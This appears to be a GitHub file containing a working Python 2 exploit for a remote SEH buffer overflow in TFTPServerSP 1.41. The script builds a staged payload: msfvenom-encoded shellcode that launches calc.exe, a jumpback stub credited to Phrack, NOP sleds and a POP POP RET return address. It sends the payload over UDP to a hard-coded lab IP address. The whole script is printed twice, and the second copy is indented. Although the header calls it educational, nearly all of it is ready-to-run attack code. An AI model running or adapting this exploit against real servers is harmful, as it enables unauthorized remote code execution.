r00tpgp/tftpd-exploit.py

## tftpd-exploit.py
#!/usr/bin/python
# Remote BoF for TFTPServerSPInstallerV1.41.
# Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts
#

import socket
import sys
host = '172.16.155.129'
port = 69
try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
        print "socket() failed"
        sys.exit(1)

# This is the original offset size 1496. Kept commented for reference.
#filename = "A" * 1496 + "\x4F\x48\x40" # + "\x43" * 3500    # 0040484F  POP POP RET

# Evil shellcode. Pop a calculator!
#msfvenom -p windows/exec cmd=calc.exe EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x2f" -f python
#Payload size: 220 bytes
buf =  ""
buf += "\xbb\xf3\x84\xd0\x15\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc\x03\x5a\xfc\x66"
buf += "\x25\xe9\xea\xe5\xc6\x12\xea\x89\x4f\xf7\xdb\x89\x34"
buf += "\x73\x4b\x3a\x3e\xd1\x67\xb1\x12\xc2\xfc\xb7\xba\xe5"
buf += "\xb5\x72\x9d\xc8\x46\x2e\xdd\x4b\xc4\x2d\x32\xac\xf5"
buf += "\xfd\x47\xad\x32\xe3\xaa\xff\xeb\x6f\x18\x10\x98\x3a"
buf += "\xa1\x9b\xd2\xab\xa1\x78\xa2\xca\x80\x2e\xb9\x94\x02"
buf += "\xd0\x6e\xad\x0a\xca\x73\x88\xc5\x61\x47\x66\xd4\xa3"
buf += "\x96\x87\x7b\x8a\x17\x7a\x85\xca\x9f\x65\xf0\x22\xdc"
buf += "\x18\x03\xf1\x9f\xc6\x86\xe2\x07\x8c\x31\xcf\xb6\x41"
buf += "\xa7\x84\xb4\x2e\xa3\xc3\xd8\xb1\x60\x78\xe4\x3a\x87"
buf += "\xaf\x6d\x78\xac\x6b\x36\xda\xcd\x2a\x92\x8d\xf2\x2d"
buf += "\x7d\x71\x57\x25\x93\x66\xea\x64\xf9\x79\x78\x13\x4f"
buf += "\x79\x82\x1c\xff\x12\xb3\x97\x90\x65\x4c\x72\xd5\x94"
buf += "\xbd\x4f\xc3\x01\x64\x3a\xae\x4f\x97\x90\xec\x69\x14"
buf += "\x11\x8c\x8d\x04\x50\x89\xca\x82\x88\xe3\x43\x67\xaf"
buf += "\x50\x63\xa2\xcc\x37\xf7\x2e\x3d\xd2\x7f\xd4\x41"

# Jumpback shellcode from phrack 62 article 7.
jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"

# Sending of staged shellcode. Read from right to left.
# Ret addr(POP POP RET) ---> 1st stage shell short jump  ------> 2nd stage long jumback shellcode  ---> evil buf
filename = "\xcc" * 973 + "\x90" * 252 + buf + "\x90" * 30 + jumpback + "\xeb\xd0\x90\x90" + "\x4F\x48\x40"

# Send payload off
mode = "netascii"
payload = "\x00\x02" + filename + "\x00" + mode+ "\0"
s.sendto(payload, (host, port))
	#!/usr/bin/python
	# Remote BoF for TFTPServerSPInstallerV1.41.
	# Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts
	#

	import socket
	import sys
	host = '172.16.155.129'
	port = 69
	try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print "socket() failed"
	sys.exit(1)

	# This is the original offset size 1496. Kept commented for reference.
	#filename = "A" * 1496 + "\x4F\x48\x40" # + "\x43" * 3500 # 0040484F POP POP RET

	# Evil shellcode. Pop a calculator!
	#msfvenom -p windows/exec cmd=calc.exe EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x2f" -f python
	#Payload size: 220 bytes
	buf = ""
	buf += "\xbb\xf3\x84\xd0\x15\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
	buf += "\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc\x03\x5a\xfc\x66"
	buf += "\x25\xe9\xea\xe5\xc6\x12\xea\x89\x4f\xf7\xdb\x89\x34"
	buf += "\x73\x4b\x3a\x3e\xd1\x67\xb1\x12\xc2\xfc\xb7\xba\xe5"
	buf += "\xb5\x72\x9d\xc8\x46\x2e\xdd\x4b\xc4\x2d\x32\xac\xf5"
	buf += "\xfd\x47\xad\x32\xe3\xaa\xff\xeb\x6f\x18\x10\x98\x3a"
	buf += "\xa1\x9b\xd2\xab\xa1\x78\xa2\xca\x80\x2e\xb9\x94\x02"
	buf += "\xd0\x6e\xad\x0a\xca\x73\x88\xc5\x61\x47\x66\xd4\xa3"
	buf += "\x96\x87\x7b\x8a\x17\x7a\x85\xca\x9f\x65\xf0\x22\xdc"
	buf += "\x18\x03\xf1\x9f\xc6\x86\xe2\x07\x8c\x31\xcf\xb6\x41"
	buf += "\xa7\x84\xb4\x2e\xa3\xc3\xd8\xb1\x60\x78\xe4\x3a\x87"
	buf += "\xaf\x6d\x78\xac\x6b\x36\xda\xcd\x2a\x92\x8d\xf2\x2d"
	buf += "\x7d\x71\x57\x25\x93\x66\xea\x64\xf9\x79\x78\x13\x4f"
	buf += "\x79\x82\x1c\xff\x12\xb3\x97\x90\x65\x4c\x72\xd5\x94"
	buf += "\xbd\x4f\xc3\x01\x64\x3a\xae\x4f\x97\x90\xec\x69\x14"
	buf += "\x11\x8c\x8d\x04\x50\x89\xca\x82\x88\xe3\x43\x67\xaf"
	buf += "\x50\x63\xa2\xcc\x37\xf7\x2e\x3d\xd2\x7f\xd4\x41"

	# Jumpback shellcode from phrack 62 article 7.
	jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"

	# Sending of staged shellcode. Read from right to left.
	# Ret addr(POP POP RET) ---> 1st stage shell short jump ------> 2nd stage long jumback shellcode ---> evil buf
	filename = "\xcc" * 973 + "\x90" * 252 + buf + "\x90" * 30 + jumpback + "\xeb\xd0\x90\x90" + "\x4F\x48\x40"

	# Send payload off
	mode = "netascii"
	payload = "\x00\x02" + filename + "\x00" + mode+ "\0"
	s.sendto(payload, (host, port))